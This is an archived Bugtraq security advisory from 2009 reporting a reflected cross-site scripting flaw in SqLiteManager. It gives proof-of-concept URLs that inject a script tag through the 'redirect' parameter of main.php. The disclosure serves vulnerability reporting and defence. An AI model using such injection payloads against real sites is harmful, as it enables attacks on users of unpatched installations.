[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XSS in SqLiteManager

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS in SqLiteManager
From: hadikiamarsi@xxxxxxxxxxx
Date: 10 Aug 2009 06:59:13 -0000

###########################################
#
# SqLiteManager ( All Version ) Cross Site Scripting
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi@xxxxxxxxx
#
# Download : 
http://downloads.sourceforge.net/project/sqlitemanager/sqlitemanager/1.2.0/SQLiteManager-1.2.0.zip?use_mirror=heanet
#
###########################################

PoC :

http://[www.example.com]/main.php?redirect=<script>alert('Hadi 
Kiamarsi')</script>

http://[www.example.com]/[PATH]/main.php?redirect=<script>alert('Hadi 
Kiamarsi')</script>


local Example :


http://localhost/main.php?redirect=<script>alert('Hadi Kiamarsi')</script>

Prev by Date: [NGENUITY] - Spiceworks Multiple Vulnerabilities (XSS & CSRF)
Next by Date: [SECURITY] [DSA 1856-1] New mantis packages fix information leak
Previous by thread: [NGENUITY] - Spiceworks Multiple Vulnerabilities (XSS & CSRF)
Next by thread: [SECURITY] [DSA 1856-1] New mantis packages fix information leak
Index(es):
- Date
- Thread